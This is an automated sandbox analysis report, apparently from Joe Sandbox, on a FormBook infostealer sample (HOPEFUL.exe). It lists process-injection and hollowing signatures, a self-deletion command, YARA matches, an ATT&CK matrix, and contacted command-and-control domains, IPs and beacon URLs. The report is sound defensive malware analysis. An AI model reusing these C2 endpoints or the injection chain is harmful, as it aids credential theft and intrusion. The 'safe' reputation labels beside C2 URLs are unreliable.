          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E18E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E03A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EA138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E9D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E1B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E12397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04EB8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04DEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 19_2_04E13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\HOPEFUL.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 35.169.40.107 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exeNetwork Connect: 174.136.37.109 80
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\HOPEFUL.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\HOPEFUL.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1040000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\HOPEFUL.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\Desktop\HOPEFUL.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\HOPEFUL.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: EB9008
          Source: C:\Users\user\Desktop\HOPEFUL.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: explorer.exe, 0000000D.00000000.297448292.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 0000000D.00000000.297975743.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000D.00000000.297975743.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000D.00000000.297975743.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\HOPEFUL.exeQueries volume information: C:\Users\user\Desktop\HOPEFUL.exe VolumeInformation
          Source: C:\Users\user\Desktop\HOPEFUL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\HOPEFUL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\HOPEFUL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Shared Modules1Valid Accounts1Valid Accounts1Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Masquerading1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection812Valid Accounts1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion3LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDisable or Modify Tools1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection812DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDeobfuscate/Decode Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Obfuscated Files or Information3Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronSoftware Packing1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339365 Sample: HOPEFUL.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 33 www.eaglesnestpropheticministry.com 2->33 35 eaglesnestpropheticministry.com 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 4 other signatures 2->49 11 HOPEFUL.exe 4 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 11->29 dropped 31 C:\Users\user\AppData\...\HOPEFUL.exe.log, ASCII 11->31 dropped 59 Writes to foreign memory regions 11->59 61 Allocates memory in foreign processes 11->61 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->63 65 Injects a PE file into a foreign processes 11->65 15 AddInProcess32.exe 11->15         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 2 other signatures 15->73 18 explorer.exe 15->18 injected process9 dnsIp10 37 tiendazoom.com 174.136.37.109, 49759, 80 IHNETUS United States 18->37 39 registeredagentfirm.com 34.98.99.30, 49758, 80 GOOGLEUS United States 18->39 41 3 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 cmmon32.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          HOPEFUL.exe31%ReversingLabsByteCode-MSIL.Packed.Generic
          HOPEFUL.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.AddInProcess32.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.the343radio.com/jqc/0%Avira URL Cloudsafe
          http://www.novergi.com/jqc/0%Avira URL Cloudsafe
          http://www.eaglesnestpropheticministry.com/jqc/0%Avira URL Cloudsafe
          http://www.bebywye.site/jqc/www.ip-freight.com0%Avira URL Cloudsafe
          http://www.the343radio.com0%Avira URL Cloudsafe
          http://www.toweroflifeinc.com/jqc/www.strahlenschutz.digital0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.weddingmustgoon.comReferer:0%Avira URL Cloudsafe
          http://www.11sxsx.com/jqc/0%Avira URL Cloudsafe
          http://www.registeredagentfirm.com/jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP0%Avira URL Cloudsafe
          http://www.ip-freight.comReferer:0%Avira URL Cloudsafe
          http://www.ip-freight.com/jqc/0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.eaglesnestpropheticministry.comReferer:0%Avira URL Cloudsafe
          http://www.novergi.com0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.theorangepearl.com/jqc/0%Avira URL Cloudsafe
          http://www.lhc965.com/jqc/0%Avira URL Cloudsafe
          http://www.registeredagentfirm.comReferer:0%Avira URL Cloudsafe
          http://www.weddingmustgoon.com/jqc/0%Avira URL Cloudsafe
          http://www.internetmarkaching.com/jqc/0%Avira URL Cloudsafe
          http://www.kenniscourtureconsignments.com0%Avira URL Cloudsafe
          http://www.lhc965.com/jqc/www.topheadlinetowitness-today.info0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.weddingmustgoon.com0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.strahlenschutz.digital/jqc/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.internetmarkaching.comReferer:0%Avira URL Cloudsafe
          http://www.tiendazoom.com/jqc/0%Avira URL Cloudsafe
          http://www.topheadlinetowitness-today.infoReferer:0%Avira URL Cloudsafe
          http://www.novergi.comReferer:0%Avira URL Cloudsafe
          http://www.theorangepearl.com0%Avira URL Cloudsafe
          http://www.novergi.com/jqc/M0%Avira URL Cloudsafe
          http://www.tiendazoom.comReferer:0%Avira URL Cloudsafe
          http://www.ip-freight.com/jqc/www.toweroflifeinc.com0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.theorangepearl.com/jqc/www.11sxsx.com0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.strahlenschutz.digitalReferer:0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.11sxsx.comReferer:0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.ip-freight.com0%Avira URL Cloudsafe
          http://www.strahlenschutz.digital0%Avira URL Cloudsafe
          http://www.topheadlinetowitness-today.info0%Avira URL Cloudsafe
          http://www.toweroflifeinc.com/jqc/0%Avira URL Cloudsafe
          http://www.topheadlinetowitness-today.info/jqc/0%Avira URL Cloudsafe
          http://www.kenniscourtureconsignments.com/jqc/0%Avira URL Cloudsafe
          http://www.bebywye.siteReferer:0%Avira URL Cloudsafe
          http://www.lhc965.com0%Avira URL Cloudsafe
          http://www.toweroflifeinc.comReferer:0%Avira URL Cloudsafe
          http://www.bebywye.site/jqc/0%Avira URL Cloudsafe
          http://www.bebywye.site0%Avira URL Cloudsafe
          http://www.tiendazoom.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p0%Avira URL Cloudsafe
          http://www.lhc965.comReferer:0%Avira URL Cloudsafe
          http://www.the343radio.com/jqc/www.registeredagentfirm.com0%Avira URL Cloudsafe
          http://www.toweroflifeinc.com0%Avira URL Cloudsafe
          http://www.registeredagentfirm.com0%Avira URL Cloudsafe
          http://www.the343radio.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp0%Avira URL Cloudsafe
          http://www.internetmarkaching.com/jqc/www.weddingmustgoon.com0%Avira URL Cloudsafe
          http://www.tiendazoom.com0%Avira URL Cloudsafe
          http://www.11sxsx.com/jqc/www.lhc965.com0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.eaglesnestpropheticministry.com/jqc/www.internetmarkaching.com0%Avira URL Cloudsafe
          http://www.kenniscourtureconsignments.comReferer:0%Avira URL Cloudsafe
          http://www.registeredagentfirm.com/jqc/0%Avira URL Cloudsafe
          http://www.topheadlinetowitness-today.info/jqc/www.kenniscourtureconsignments.com0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          registeredagentfirm.com
          34.98.99.30
          truetrue
            unknown
            tiendazoom.com
            174.136.37.109
            truetrue
              unknown
              www.the343radio.com
              35.169.40.107
              truetrue
                unknown
                eaglesnestpropheticministry.com
                34.102.136.180
                truetrue
                  unknown
                  www.tiendazoom.com
                  unknown
                  unknowntrue
                    unknown
                    www.registeredagentfirm.com
                    unknown
                    unknowntrue
                      unknown
                      www.eaglesnestpropheticministry.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.registeredagentfirm.com/jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiPtrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.tiendazoom.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9ptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.the343radio.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPptrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.the343radio.com/jqc/explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.novergi.com/jqc/explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.eaglesnestpropheticministry.com/jqc/explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.com/designersGexplorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpfalse
                          high
                          http://www.bebywye.site/jqc/www.ip-freight.comexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.the343radio.comexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.toweroflifeinc.com/jqc/www.strahlenschutz.digitalexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fontbureau.com/designers/?explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.weddingmustgoon.comReferer:explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.11sxsx.com/jqc/explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designers?explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpfalse
                              high
                              http://www.ip-freight.comReferer:explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.ip-freight.com/jqc/explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.tiro.comexplorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.eaglesnestpropheticministry.comReferer:explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com/designersexplorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpfalse
                                high
                                http://www.novergi.comexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.goodfont.co.krexplorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.theorangepearl.com/jqc/explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.lhc965.com/jqc/explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.registeredagentfirm.comReferer:explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.weddingmustgoon.com/jqc/explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.internetmarkaching.com/jqc/explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.kenniscourtureconsignments.comexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.lhc965.com/jqc/www.topheadlinetowitness-today.infoexplorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
